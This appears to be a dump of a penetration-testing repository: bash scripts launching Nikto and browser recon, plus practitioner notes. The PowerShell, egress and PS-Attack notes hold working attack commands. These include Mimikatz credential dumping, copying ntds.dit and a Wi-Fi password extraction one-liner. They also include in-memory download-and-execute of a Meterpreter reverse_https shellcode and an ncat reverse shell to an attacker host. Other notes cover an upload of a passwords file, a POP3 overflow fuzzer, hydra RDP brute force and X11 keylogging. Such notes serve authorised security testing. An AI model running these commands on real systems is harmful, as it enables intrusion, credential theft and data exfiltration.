 22 | echo "4.  Previous menu"
 23 | echo
 24 | echo -n "Choice: "
 25 | read -r CHOICE
 26 | 
 27 | case "$CHOICE" in
 28 |     1)
 29 |         f_location
 30 |         echo
 31 |         echo -n "Use an https prefix? (y/N) "
 32 |         read -r PREFIX
 33 | 
 34 |         if [ -z "$PREFIX" ]; then
 35 |             while read -r i; do
 36 |                 xdg-open http://"$i" &
 37 |                 sleep 2
 38 |             done < "$LOCATION"
 39 | 
 40 |         elif [ "$PREFIX" == "y" ]; then
 41 |             while read -r i; do
 42 |                 xdg-open https://"$i" &
 43 |                 sleep 2
 44 |             done < "$LOCATION"
 45 | 
 46 |         else
 47 |             f_error
 48 |         fi
 49 | 
 50 |         exit
 51 |         ;;
 52 |     2)
 53 |         echo
 54 |         echo "$MEDIUM"
 55 |         echo
 56 |         echo -n "Enter the location of your directory: "
 57 |         read -r LOCATION
 58 | 
 59 |         # Check for no answer
 60 |         if [ -z "$LOCATION" ]; then
 61 |             f_error
 62 |         fi
 63 | 
 64 |         # Check for wrong answer
 65 |         if [ ! -d "$LOCATION" ]; then
 66 |             f_error
 67 |         fi
 68 | 
 69 |         cd "$LOCATION" || exit
 70 | 
 71 |         # option 1
 72 |         for i in $(ls -l | awk '{print $9}'); do
 73 |             xdg-open "$i" &
 74 |             sleep 2
 75 |         done
 76 | 
 77 |         exit
 78 |         ;;
 79 |     3)
 80 |         echo
 81 |         echo "$MEDIUM"
 82 |         echo
 83 |         echo "Usage: target.com or target-IP"
 84 |         echo
 85 |         echo -n "Domain: "
 86 |         read -r DOMAIN
 87 | 
 88 |         # Check for no answer
 89 |         if [ -z "$DOMAIN" ]; then
 90 |             f_error
 91 |         fi
 92 | 
 93 |         curl -kLs "$DOMAIN"/robots.txt -o robots.txt
 94 | 
 95 |         if ! curl -kLs "$DOMAIN"/robots.txt -o robots.txt; then
 96 |             echo
 97 |             echo -e "${RED}[!] Failed to connect to $DOMAIN.${NC}"
 98 |             echo
 99 |             exit 1
100 |         fi
101 | 
102 | #        # Check if the file is empty
103 | #        if [ ! -s robots.txt ]; then
104 | #            echo
105 | #            echo -e "${RED}$MEDIUM${NC}"
106 | #            echo
107 | #            echo -e "${RED}[*] No robots.txt file discovered.${NC}"
108 | #            echo
109 | #            echo -e "${RED}$MEDIUM${NC}"
110 | #            echo
111 | #            exit 1
112 | #        fi
113 | 
114 |         grep -i 'disallow' robots.txt | awk '{print $2}' | grep -iv disallow | sort -u > tmp
115 | 
116 |         while read -r i; do
117 |             xdg-open "https://$DOMAIN$i" &
118 |             sleep 2
119 |         done < tmp
120 | 
121 |         rm robots.txt
122 |         mv tmp "$HOME"/data/"$DOMAIN"-robots.txt
123 | 
124 |         echo
125 |         echo "$MEDIUM"
126 |         echo
127 |         echo "[*] Scan complete."
128 |         echo
129 |         echo -e "The new report is located at ${YELLOW}$HOME/data/$DOMAIN-robots.txt${NC}"
130 |         echo
131 |         exit
132 |         ;;
133 |     4) f_main ;;
134 |     *) echo; echo -e "${RED}[!] Invalid choice or entry, try again.${NC}"; echo; sleep 2; "$DISCOVER"/multiTabs.sh ;;
135 | esac
136 | 


--------------------------------------------------------------------------------
/nikto.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | # Check for regular user
 6 | if [ "$EUID" == 0 ]; then
 7 |     echo
 8 |     echo "[!] This option cannot be ran as root."
 9 |     echo
10 |     exit   # In this case do not use exit 1, it will break the script
11 | fi
12 | 
13 | clear
14 | f_banner
15 | 
16 | echo -e "${BLUE}Run multiple instances of Nikto in parallel.${NC}"
17 | echo
18 | echo "1.  List of IPs"
19 | echo "2.  List of IP:port"
20 | echo "3.  Previous menu"
21 | echo
22 | echo -n "Choice: "
23 | read -r CHOICE
24 | 
25 | case "$CHOICE" in
26 |     1)  f_location
27 | 
28 |         echo
29 |         echo -n "Port (default 80): "
30 |         read -r PORT
31 |         echo
32 | 
33 |         # Set default port to 80 if not provided
34 |         if [ -z "$PORT" ]; then
35 |             PORT=80
36 |         fi
37 | 
38 |         # Check for a valid port number
39 |         if ! [[ "$PORT" =~ ^[0-9]+$ ]] || [ "$PORT" -lt 1 ] || [ "$PORT" -gt 65535 ]; then
40 |             f_error
41 |         fi
42 | 
43 |         mkdir -p "$HOME/data/nikto-$PORT"
44 | 
45 |         while IFS= read -r LINE; do
46 |             xdotool key ctrl+shift+t
47 |             xdotool type "nikto -h $LINE -port $PORT -no404 -maxtime 15m -Format htm --output $HOME/data/nikto-$PORT/$LINE.htm ; exit"
48 |             sleep 1
49 |             xdotool key Return
50 |         done < "$LOCATION"
51 |         ;;
52 | 
53 |     2)  f_location
54 | 
55 |         mkdir -p "$HOME/data/nikto"
56 | 
57 |         while IFS=: read -r HOST PORT; do
58 |             xdotool key ctrl+shift+t
59 |             sleep 1
60 |             xdotool type "nikto -h $HOST -port $PORT -no404 -maxtime 15m -Format htm --output $HOME/data/nikto/$HOST-$PORT.htm ; exit"
61 |             sleep 1
62 |             xdotool key Return
63 |         done < "$LOCATION"
64 |         ;;
65 | 
66 |     3)  f_main ;;
67 | 
68 |     *) echo; echo -e "${RED}[!] Invalid choice or entry, try again.${NC}"; echo; sleep 2; "$DISCOVER"/nikto.sh ;;
69 | esac
70 | 
71 | echo
72 | echo "$MEDIUM"
73 | echo
74 | echo "[*] Scan complete."
75 | echo
76 | echo -e "The new report is located at ${YELLOW}$HOME/data/nikto-$PORT/${NC}"
77 | 


--------------------------------------------------------------------------------
/notes/PowerShell/PS-Attack.txt:
--------------------------------------------------------------------------------
 1 | PS-Attack
 2 | 
 3 | 
 4 | PSAttack.exe
 5 | Get-Attack <search string>
 6 | Get-Attack escalation
 7 | Invoke-MS16-032                                       Should give you a system level command prompt
 8 | 
 9 | PSAttack.exe
10 | Get-Attack mimi
11 | Get-Help Invoke-Mimikatz
12 | Invoke-Mimikatz -DumpCreds
13 | Get-Attack users
14 | Get-NetUser
15 | ------------------------------------------------------------------------------------------------------------------------------------------------------
16 | 
17 | Get-GPPPassword                                       Found a user: lee
18 | Get-Attack "active directory"
19 | Get-Help Get-NetUser
20 | Get-NetUser -UserName lee                             Member of a security group called LocalAdmin
21 | Get-Attack groups
22 | Get-Help Get-NetLocalGroup
23 | Get-NetLocalGroup -GroupName "Administrators"         List everyone in the local Administrators group
24 | 
25 | Restart PS>Attack
26 | Right click on icon > Run as Administrator            Enter admin creds
27 | Get-Attack "local admin"
28 | Find-LocalAdminAccess                                 Show other computers where these admin creds have admin access
29 | Get-Attack find
30 | Get-Help Invoke-UserHunter
31 | Get-Help Invoke-UserHunter -Examples
32 | Invoke-UserHunter -CheckAccess
33 | Get-Help Invoke-Mimikatz
34 | Invoke-Mimikatz -ComputerName <name> -DumpCreds
35 | 
36 | Restart PS>Attack
37 | Right click on icon > Run as Administrator            Enter the domain admin creds
38 | Get-Attack "domain controller"
39 | Get-NetDomainController
40 | Get-Attack copy
41 | Get-Help Invoke-NinjaCopy -Examples
42 | Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit"     ComputerName <DC> -LocalDestination "C:\ntds.dit"
43 | ls
44 | 


--------------------------------------------------------------------------------
/notes/PowerShell/basic.txt:
--------------------------------------------------------------------------------
  1 | PowerShell - Basics
  2 | 
  3 | 
  4 | # version
  5 | $host.Version
  6 | 
  7 | # cmdlets
  8 | Every cmdlet in PS starts with a 'verb-noun'.
  9 | 
 10 | Get-Command                                    Show all commands
 11 | Get-Verb                                       Show all verbs
 12 | 
 13 | Get-ChildItem -Recurse                         Show the contents of thee current working directory and all subdirectories
 14 | Get-ChildItem -Path C:\Users\lee\Downloads -Recurse
 15 | Get-Process
 16 | Start-Process .\notepad.exe
 17 | Stop-Process -Name notepad
 18 | Get-Process | select-object Processname, id    Show all running processes
 19 | get-process -IncludeUserName | ft Username, processname | findstr <user>     Show processes running under a specific user
 20 | 
 21 | # Alias
 22 | Get-Alias                                      Show all aliases
 23 | New-Alias -Name "Show-Files" Get-ChildItem     Create a new alias
 24 | Get-Alias -Name "Show-Files"                   Get info on an alias
 25 | 
 26 | # Help
 27 | Get-Help <package>                             Get help on a package
 28 | help Import-Module -Examples
 29 | 
 30 | # Execution Policy
 31 | Get-ExecutionPolicy -List
 32 | Set-ExecutionPolicy Bypass -Scope Process
 33 | 
 34 | # File types
 35 | script file            .ps1
 36 | script data file       .psd1
 37 | script module file     .psm1
 38 | 
 39 | # Vocabulary
 40 | string       Any combination of letters and numbers that are surrounded by quotes. Used for printing stuff.
 41 | integer      A number without quotes. Used for math.
 42 | boolean      True or false.
 43 | variable     A value that can be assigned over the course of a script.
 44 | 
 45 | # Objects
 46 | PS C:\> $a = "apple" 
 47 | PS C:\> $a.Length
 48 | 5
 49 | PS C:\> $a.ToUpper()
 50 | APPLE
 51 | 
 52 | # Arrays
 53 | PS C:\> $list = "red", "white", "blue"
 54 | PS C:\> $list[0]
 55 | red
 56 | PS C:\> $list[2]
 57 | blue
 58 | 
 59 | # For loops
 60 | $list = "one", "two", "three"
 61 | forEach ($item in $list){
 62 |      write-host = $item
 63 | }
 64 | 
 65 | $dirs = Get-ChildItem C:\
 66 | forEach ($dir in $dirs){
 67 |      write-host $dir.FullName
 68 |      write-host "-----"
 69 |      $acl = $dir.GetAccessControl()
 70 |      write-host $acl.AccessToString
 71 |      write-host
 72 | }
 73 | 
 74 | # While loops
 75 | $i = 1
 76 | while ($i -le 5){
 77 |      write-host $i
 78 |      $i = $i + 1
 79 | }
 80 | ------------------------------------------------------------------------------------------------------------------------------------------------------
 81 | 
 82 | C:\> powershell -nop -exec bypass      Start PowerShell and bypass the execution policy
 83 | 
 84 | mode 300                               Full screen
 85 | Get-Command                            Show all commands
 86 | Get- <tab>                             Tab through each command
 87 | Get-History                            Show Command history
 88 | Get-Process                            Show current running processes
 89 | 
 90 | Get-Help <tool>                        Get help on any tool
 91 | 
 92 | - Show Wi-Fi passwords
 93 | (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
 94 | ------------------------------------------------------------------------------------------------------------------------------------------------------
 95 | 
 96 | # Download a file
 97 | cd /opt/PowerSploit/Recon/
 98 | python3 -m http.server 80
 99 | 
100 | powershell -nop -exec bypass
101 | iwr -UseBasicParsing http://172.16.219.133/PowerView.ps1 -OutFile .\PowerView.ps1
102 | Import-Module .\PowerView.ps1
103 | Get-NetLocalGroup
104 | 
105 | # Execute a remote file in memory
106 | powershell -nop -exec bypass
107 | iex (iwr -UseBasicParsing http://172.16.219.133/PowerView.ps1); Get-NetLocalGroup
108 | 
109 | # Upload a file
110 | powershell -nop -exec bypass
111 | IEX "(New-Object Net.WebClient).UploadString('http://192.168.1.5/passwords.txt',"<PostDATA>")"
112 | ------------------------------------------------------------------------------------------------------------------------------------------------------
113 | 
114 | # PowerSploit - getting a shell without writing to disk     *** NEED to VERIFY ***
115 | 
116 | msfconsole
117 | use exploit/multi/handler
118 | set payload windows/meterpreter/reverse_https
119 | set lhost 192.168.1.5
120 | set lport 443
121 | exploit -j
122 | 
123 | - Open a new tab
124 | cd /opt/PowerSploit/CodeExecution/
125 | python3 -m http.server 80
126 | 
127 | - Windows execute a remote file in memory
128 | powershell -nop -exec bypass
129 | IEX "(New-Object Net.WebClient).DownloadString('http://192.168.1.5/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.5 -Lport 443 -Force"
130 | 


--------------------------------------------------------------------------------
/notes/Python/ex1.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import os
 4 | import sys
 5 | 
 6 | os.system("clear")
 7 | 
 8 | port = raw_input("\nEnter a valid port: ")
 9 | 
10 | if port == "":
11 |      print "\nYou did not enter anything.\n\n"
12 |      sys.exit(1)
13 | 
14 | try:
15 |      val = int(port)
16 | except ValueError:
17 |      print("\nThat is not an number.\n\n")
18 |      sys.exit(1)
19 | 
20 | if int(port) not in range(1,65535):
21 |      print "\nThat is an invalid port.\n\n"
22 | else:
23 |      print "\nThat is a valid port.\n\n"
24 | 


--------------------------------------------------------------------------------
/notes/Python/fuzzer-pop3.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import os
 4 | import socket
 5 | 
 6 | os.system("clear")
 7 | 
 8 | # Create an array of buffers from 10 to 2000, with increments of 20.
 9 | buffer=["A"]
10 | counter=100
11 | 
12 | while len(buffer) <= 30:
13 |      buffer.append("A"*counter)
14 |      counter=counter+200
15 | 
16 | for string in buffer:
17 |      print "\n\nFuzzing PASS with %s bytes." % len(string)
18 | 
19 |      s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
20 |      connect=s.connect(("172.16.181.135",110))    # Connect to IP on port 110.
21 | 
22 |      s.recv(1024)                                 # Receive reply.
23 |      s.send("USER test\r\n")                      # Send username 'test'.
24 |      s.recv(1024)                                 # Receive reply.
25 |      s.send("PASS " + string + "\r\n")            # Send password 'PASS' plus random buffer.
26 |      s.send("QUIT\r\n")                           # Send command 'QUIT'.
27 |      s.close()                                    # Close socket.
28 | 


--------------------------------------------------------------------------------
/notes/Python/scrape.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | import sys
 4 | import webbrowser
 5 | from time import sleep
 6 | 
 7 | 
 8 | def main():
 9 |     company = 'Google'
10 |     domain = 'google.com'
11 | 
12 |     # Add only URL's that take the domain URL
13 |     urls_domain = [
14 |         'https://api.hackertarget.com/dnslookup/?q=',
15 |         'https://api.hackertarget.com/reversedns/?q=',
16 |         'https://api.hackertarget.com/pagelinks/?q=',
17 |         'https://seositecheckup.com/seo-audit/',
18 |         'http://viewdns.info/reversewhois/?q=',
19 |         'http://viewdns.info/dnsreport/?domain=',
20 |         'http://www.spyonweb.com/'
21 |     ]
22 | 
23 |     # Add only URL's that take the company name
24 |     urls_company = [
25 |         'https://censys.io/ipv4?q=',
26 |         'https://www.shodan.io/search?query='
27 |     ]
28 | 
29 |     for url in urls_domain:
30 |         webbrowser.open_new_tab(url + domain)
31 |         sleep(2)
32 | 
33 |     for comp in urls_company:
34 |         webbrowser.open_new_tab(comp + company)
35 |         sleep(2)
36 | 
37 | 
38 | if __name__ == '__main__':
39 |     main()
40 |     sys.exit(0)
41 | 


--------------------------------------------------------------------------------
/notes/Python/test.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import os
 4 | 
 5 | os.system("clear")
 6 | 
 7 | f = open("tmp","r")                                # Setup a read connection to file
 8 | filedata = f.read()                                # Read the file
 9 | f.close()                                          # Close the connection
10 | filedata = filedata.split("\n")                    # Turn into a list
11 | 
12 | ##############################
13 | 
14 | out = []                                           # Create an empty array
15 | 
16 | for i in filedata:
17 |      if "@" in i:                                  # grep '@'
18 |           if not "apples" in i:                    # grep -v 'apples'
19 |                out.append(i.lower())               # Append to array and change to lower case
20 | 
21 | out = list(set(out))                               # Make list unique
22 | out.sort()                                         # Sort
23 | 
24 | for j in out:
25 |      print j
26 | 


--------------------------------------------------------------------------------
/notes/cidr.txt:
--------------------------------------------------------------------------------
 1 | CIDR    Netmask             Networks           Usable IPs
 2 | /1      128.0.0.0             128 Class As     2,147,483,646
 3 | /2      192.0.0.0              64 Class As     1,073,741,822
 4 | /3      224.0.0.0              32 Class As       536,870,910
 5 | /4      240.0.0.0              16 Class As       268,435,454
 6 | /5      248.0.0.0               8 Class As       134,217,726
 7 | /6      252.0.0.0               4 Class As        67,108,862
 8 | /7      254.0.0.0               2 Class As        33,554,430
 9 | /8      255.0.0.0               1 Class As        16,777,214
10 | /9      255.128.0.0           128 Class Bs         8,388,606
11 | /10     255.192.0.0            64 Class Bs         4,194,302
12 | /11     255.224.0.0            32 Class Bs         2,097,150
13 | /12     255.240.0.0            16 Class Bs         1,048,574
14 | /13     255.248.0.0             8 Class Bs           524,286
15 | /14     255.252.0.0             4 Class Bs           262,142
16 | /15     255.254.0.0             2 Class Bs           131,070
17 | /16     255.255.0.0             1 Class Bs            65,534
18 | /17     255.255.128.0         128 Class Cs            32,766
19 | /18     255.255.192.0          64 Class Cs            16,382
20 | /19     255.255.224.0          32 Class Cs             8,190
21 | /20     255.255.240.0          16 Class Cs             4,094
22 | /21     255.255.248.0           8 Class Cs             2,046
23 | /22     255.255.252.0           4 Class Cs             1,022
24 | /23     255.255.254.0           2 Class Cs               510
25 | /24     255.255.255.0           1 Class C                254
26 | /25     255.255.255.128       1/2 Class C                126
27 | /26     255.255.255.192       1/4 Class C                 62
28 | /27     255.255.255.224       1/8 Class C                 30
29 | /28     255.255.255.240      1/16 Class C                 14
30 | /29     255.255.255.248      1/32 Class C                  6
31 | /30     255.255.255.252      1/64 Class C                  2
32 | /31     255.255.255.254     1/128 Class C                  2
33 | /32     255.255.255.255     1/256 Class C                  1
34 | ------------------------------------------------------------------------------------------------------------------------------------------------------
35 | 
36 | # Reserved Networks
37 | 
38 | CIDR               Usable IPs     Comment
39 | 10.0.0.0/8         16,777,214     1 Class A, non-routable private networks
40 | 172.16.0.0/12      1,048,574      16 contiguous Class Bs, non-routable private networks
41 | 192.168.0.0/16     65,534         256 contiguous Class Cs, non-routable private networks
42 | 
43 | 169.254.0.0/16     65,534         Self assigned IP when DHCP is not available      
44 | 
45 | 


--------------------------------------------------------------------------------
/notes/consulting.txt:
--------------------------------------------------------------------------------
 1 | Consulting
 2 | 
 3 | 
 4 | # Backpack
 5 |      Update your VMs and tools.
 6 |      Power strip and extension chord.
 7 |      4 port switch.
 8 |      25’ CAT6 cable.
 9 |      (2) 6’ CAT6 cables.
10 |      (2) USB C ethernet adapters.
11 | 
12 | # Dress
13 |      No hats or sunglasses inside.
14 |      Shave
15 |      Long hair should be slicked back in a ponytail.
16 |      Shirt - pressed button up, one button from the top, tucked in.
17 |      Pants - pressed, belt, no jeans.
18 |      Shoes - shined.
19 | 
20 | # Set expectations up front
21 |      Number of days.
22 |      Start, lunch, and stop times.
23 |      Status updates.
24 |      Deliverable.
25 | 
26 | # Know your environment
27 |      Location of bathroom.
28 |      People will be watching AND listening.
29 |      Leave your area clean.
30 | 
31 | # Client
32 |      Treat them with respect (yes sir, no ma’am).
33 |      Be responsive.
34 |      Control the client and the engagement, don’t let them control you.
35 |      Beware hovering.
36 |      You are not there to teach.
37 | 


--------------------------------------------------------------------------------
/notes/dns.txt:
--------------------------------------------------------------------------------
 1 | DNS
 2 | 
 3 | 
 4 | # General
 5 | 
 6 | dig target.com <type>                    a, mx, ns, soa, srv, txt, any
 7 | dig -x <target IP>                       Pointer records
 8 | dig @nameserverIP target.com axfr        Zone transfer
 9 | dig @nameserverIP target.com afro        Forward zone transfer
10 | 
11 | host -t ns target.com                    Show name servers 
12 | host -t mx target.com                    Show mail servers
13 | host www.target.com
14 | host -l target.com <nameserver>          Zone transfer
15 | ------------------------------------------------------------------------------------------------------------------------------------------------------
16 |  
17 | # Cache snooping
18 | 
19 | host -r www.google.com <nameserver IP>
20 | ------------------------------------------------------------------------------------------------------------------------------------------------------
21 | 
22 | # DNS cache poisioning
23 | 
24 | for i in `53.txt`; do dig @"$i" +short porttest.dns-oarc.net TXT; done; > CachePoison.txt
25 | ------------------------------------------------------------------------------------------------------------------------------------------------------
26 | 
27 | # Non-recursive DNS queries
28 | 
29 | for i in `cat 53.txt`; do dig @"$i" www.google.com A +norecurse; done > NonRecurive.txt
30 | ------------------------------------------------------------------------------------------------------------------------------------------------------
31 | 
32 | # Open DNS resolution against a DNS server.
33 | 
34 | Supply a hostname not cached or inside a company owned domain.
35 | nslookup www.nsa.gov <nameserver IP>
36 | ------------------------------------------------------------------------------------------------------------------------------------------------------
37 | 
38 | # Spoofed request amplification DDoS
39 | 
40 | for i in `cat 53.txt`; do dig @"$i" . NS; done > AmpDDoS.txt
41 | 


--------------------------------------------------------------------------------
/notes/egress.txt:
--------------------------------------------------------------------------------
 1 | Egress
 2 | 
 3 | 
 4 | target - Ubuntu     10.0.0.10
 5 | target2 - Windows   10.0.0.11
 6 | attacker            10.0.0.5
 7 | 
 8 | # netcat
 9 | target              nc 10.0.0.5 80
10 | attacker            nc -lvp 80
11 | 
12 | # ncat
13 | target              ncat 10.0.0.5 --ssl -e /bin/bash
14 | attacker            ncat -l 443 --ssl
15 | 
16 | # cryptcat
17 | target              cryptcat 10.0.0.5 80 -k password
18 | attacker            cryptcat -lvp 80 -k password
19 | 
20 | # Egress-Assess
21 | 
22 | Works as a client/server model.
23 | 
24 | ./Egress-Assess.py -h
25 | ./Egress-Assess.py --list-clients        dns, dns_resolved, ftp, http, https, icmp, sftp, smb, smtp
26 | ./Egress-Assess.py --list-servers        dns, ftp, http, https, icmp, sftp, smb, smtp
27 | ./Egress-Assess.py --list-actors         darkhotel, etumbot, putterpanda, zeus
28 | ./Egress-Assess.py --list-datatypes      cc, identity, ni, ssn
29 | 
30 | - Server
31 | ./Egress-Assess.py --server <payload & options>
32 | ./Egress-Assess.py --server http --server-port 8000
33 | 
34 | - Client
35 | ./Egress-Assess.py --client <payload & options> --ip <server> --datatype <cc or ssn> --data-size <# of MB>
36 | ./Egress-Assess.py --client http --client-port 8000 --ip <server> --file /tmp/secret.txt
37 | ./Egress-Assess.py --client http --client-port 8000 --ip <server> --datatype cc --data-size 5
38 | 
39 | Transferred data is stored in data/.
40 | 
41 | Example 2
42 | - Server
43 | ./Egress-Assess.py --server https
44 | 
45 | - Client
46 | ./Egress-Assess.py --client https --ip <server> --file /tmp/secret.txt
47 | ./Egress-Assess.py --client https --ip <server> --datatype ssn --data-size 5
48 | 
49 | Example 3
50 | - Server
51 | ./Egress-Assess.py --server ftp --username lee --password hack
52 | 
53 | - Client
54 | ./Egress-Assess.py --client ftp --username lee --password hack --file /tmp/secret.txt
55 | ./Egress-Assess.py --client ftp --username lee --password hack --datatype identity --data-size 5
56 | 
57 | - PowerShell version can only be used as a client.
58 | Its not a one-for-one port. Not all options are the same.
59 | Be sure to use a single dash instead of a double.
60 | 
61 | powershell -nop -exec bypass
62 | Import-Module .\EgressAssess.ps1
63 | 
64 | Invoke-EgressAssess -Client http -Port 8000 -IP <server> -Datatype "c:\Users\lee\secret.txt"
65 | Invoke-EgressAssess -Client http -Port 8000 -IP <server> -Datatype ni -Size 5 -Fast
66 | 
67 | Invoke-EgressAssess -Client ftp -IP <server> -Username lee -Password hack -Datatype "c:\Users\lee\secret.txt"
68 | 
69 | Note: Comcast blocks port 25 and 445. If you are testing smtp or smb, use alternate ports.
70 | 


--------------------------------------------------------------------------------
/notes/exploits.txt:
--------------------------------------------------------------------------------
 1 | Exploits
 2 | 
 3 | 
 4 | searchsploit <term1> <term2> <term3>
 5 | searchsploit -t <title>
 6 | 
 7 | searchsploit -t HP iLo 4
 8 | searchsploit -p -x 44005                                   Show info on the exploit
 9 | cp /usr/share/exploitdb/multiple/remote/44005.py /tmp/     Copy the exploit to a new location
10 | ------------------------------------------------------------------------------------------------------------------------------------------------------
11 | 
12 | # Identify if C code is written for Windows or Linux.
13 | 
14 | Windows - process.h, string.h, winbase.h, windows.h, winsock2.h
15 | Linux - arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
16 | ------------------------------------------------------------------------------------------------------------------------------------------------------
17 | 
18 | # Grep out Windows headers, to leave only Linux based exploits.
19 | 
20 | cat sploitlist.txt | grep -i 'exploit' | cut -d ' ' -f1 | xargs grep 'sys' | cut -d ':' -f1 | sort -u
21 | ------------------------------------------------------------------------------------------------------------------------------------------------------
22 | 
23 | # Compiling
24 | 
25 | gcc -o exploit 1234.c                                      Basic GCC compile
26 | gcc -m32 -o exploit 2345.c                                 Cross compile 32-bit binary on 64-bit Linux
27 | i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe     Cross compile a Windows .exe on Linux
28 | i586-mingw32msvc-gcc adduser.c -o adduser.exe              Cross compile a Windows .exe on Linux
29 | ------------------------------------------------------------------------------------------------------------------------------------------------------
30 | 
31 | # Visual Studio
32 | 
33 | Select Desktop developement with C++
34 | On the right, select C++/CLI support for v143 buile tools
35 | 


--------------------------------------------------------------------------------
/notes/git.txt:
--------------------------------------------------------------------------------
 1 | Git
 2 | 
 3 | 
 4 | # Setup your identity and suppress warnings.
 5 | 
 6 | git config --global user.name "Lee Baird"
 7 | git config --global user.email "leebaird@acme.com"
 8 | git config --global pull.rebase false
 9 | ------------------------------------------------------------------------------------------------------------------------------------------------------
10 | 
11 | # Fork a repo
12 | 
13 | - Using a web browser.
14 | Fork > Create fork
15 | 
16 | - Using the command line.
17 | git clone git@github.com:<username>/<forked repo>
18 | git clone git@github.com:leebaird/shad0w.git
19 | cd shad0w/
20 | 
21 | - Add the upstream repo so that you can pull changes.
22 | git remote add upstream https://github.com/<original repo>
23 | git remote add upstream https://github.com/bats3c/shad0w.git
24 | 
25 | - Validate connectivity.
26 | ssh -T git@github.com
27 | ------------------------------------------------------------------------------------------------------------------------------------------------------
28 | 
29 | # Keep your fork updated.
30 | 
31 | - Using a web browser.
32 | Select Sync fork.
33 | 
34 | - Using the command line.
35 | git fetch upstream                    Pull the latest changes from the upstream repo
36 | git checkout master                   Make sure you are working on the master branch
37 | git merge upstream/master             Merge the latest upstream changes
38 | git status                            Check the status
39 | git push origin master                Push the new changes to your fork
40 | 
41 | git checkout dev                      Change to the dev branch
42 | git merge master                      Merge the latest master changes
43 | git push origin dev -f                Push the updated branch back to the dev branch in your fork
44 | ------------------------------------------------------------------------------------------------------------------------------------------------------
45 | 
46 | # Working on a new branch.
47 | 
48 | git status                            Check the status
49 | git branch                            Show local branches
50 | git branch -r                         Show remote branches
51 | 
52 | git branch dev                        Create a new dev branch
53 | git checkout dev                      Change to the dev branch
54 | 
55 | Make various changes to files.
56 | 
57 | git add -A                            Add all edits
58 | git add <file1> <file2>               Add specific edits
59 | git commit -am 'message'              Add commit message
60 | git push origin master                Push the new changes to your fork
61 | 
62 | Refresh your web browser to see the changes.
63 | 
64 | - Delete branches.
65 | 
66 | git branch -D <branch>                Local
67 | git push origin --delete <branch>     Remote
68 | ------------------------------------------------------------------------------------------------------------------------------------------------------
69 | 
70 | # Create a pull request.
71 | 
72 | - Using a web browser.
73 | Click on Pull requests > New pull request > Create pull request
74 | Enter a description > Create pull request
75 | 
76 | 


--------------------------------------------------------------------------------
/notes/insecure-protocols.txt:
--------------------------------------------------------------------------------
 1 | Insecure Protocols
 2 | 
 3 | 
 4 | # FTP access with admin/null credentials
 5 | 
 6 | ftp admin@<target IP>
 7 | user
 8 | admin
 9 | pwd
10 | 
11 | telnet <target IP> 21
12 | user admin
13 | pass
14 | id;
15 | ------------------------------------------------------------------------------------------------------------------------------------------------------
16 | 
17 | # FTP on non-standard port
18 | 
19 | ftp <target IP> <port>
20 | ------------------------------------------------------------------------------------------------------------------------------------------------------
21 | 
22 | # FTP server does not support AUTH command
23 | 
24 | telnet <target IP> 21
25 | AUTH test
26 | ------------------------------------------------------------------------------------------------------------------------------------------------------
27 | 
28 | # Remote Desktop
29 | 
30 | hydra -t 4 -V -l administrator -P /usr/share/wordlists/rockyou.txt rdp://targetIP
31 | ------------------------------------------------------------------------------------------------------------------------------------------------------
32 | 
33 | # Rservices
34 | 
35 | 513/tcp
36 | apt install rsh-client
37 | rlogin -l root <target IP>
38 | ------------------------------------------------------------------------------------------------------------------------------------------------------
39 | 
40 | # SSH Protocol v1
41 | 
42 | nmap -Pn -n -T4 -p22 --script=sshv1 <target IP>
43 | 
44 | ssh -1 <target IP>
45 | ------------------------------------------------------------------------------------------------------------------------------------------------------
46 | 
47 | # X11
48 | 
49 | nmap -Pn -n -T4 -p6000-6010 --script=x11-access <target IP>
50 | 
51 | xspy <target IP>
52 | 
53 | OS X
54 | - Screenshot
55 | xwd -display <targetIP>:<display> -root -out file.xwd
56 | 
57 | - View screenshot
58 | xwud -in file.xwd
59 | 
60 | - Key logging
61 | xkey <targetIP>:0.0
62 | 
63 | xdotool inject
64 | Open another Terminal and type:
65 | 
66 | export DISPLAY=<ipaddress>:0
67 | 
68 | $ xdotool key x t e r m
69 | $ xdotool key KP_Enter
70 | 
71 | Might need to inject 1 char at a time:
72 | 
73 | xdotool key x
74 | xdotool key t
75 | xdotool key e
76 | xdotool key r
77 | xdotool key m
78 | 


--------------------------------------------------------------------------------
/notes/ldap-owa.txt:
--------------------------------------------------------------------------------
  1 | LDAP-OWA
  2 | 
  3 | 
  4 | Lightweight Directory Access Protocol
  5 | Leverages Kerberos v5 for authentication.
  6 | 
  7 | ip=10.0.0.10
  8 | echo $ip
  9 | 
 10 | shodan host $ip
 11 | 
 12 | nmap -Pn -n -T4 --open $ip
 13 | nmap -Pn -n -T4 --open -p389,636,3269 --script=ldap*,ssl* $ip
 14 | ---------------------------------------------------------------------------------------------------------------------
 15 | 
 16 | crackmapexec ldap $ip -u Administrator -p passwords.txt
 17 | crackmapexec ldap $ip --port 636 -u Administrator -p passwords.txt
 18 | ---------------------------------------------------------------------------------------------------------------------
 19 | 
 20 | # Autodiscover
 21 | 
 22 | https://autodiscover.target.com/autodiscover/autodiscover.xml
 23 | https://target.com/autodiscover/autodiscover.xml
 24 | ---------------------------------------------------------------------------------------------------------------------
 25 | 
 26 | # SprayingToolkit
 27 | 
 28 | This will show the internal domain name.
 29 | atomizer.py owa 'https://webmail.target.com/Autodiscover' --recon
 30 | atomizer.py owa 'https://webmail.target.com/ews/exchange.asmx' --recon
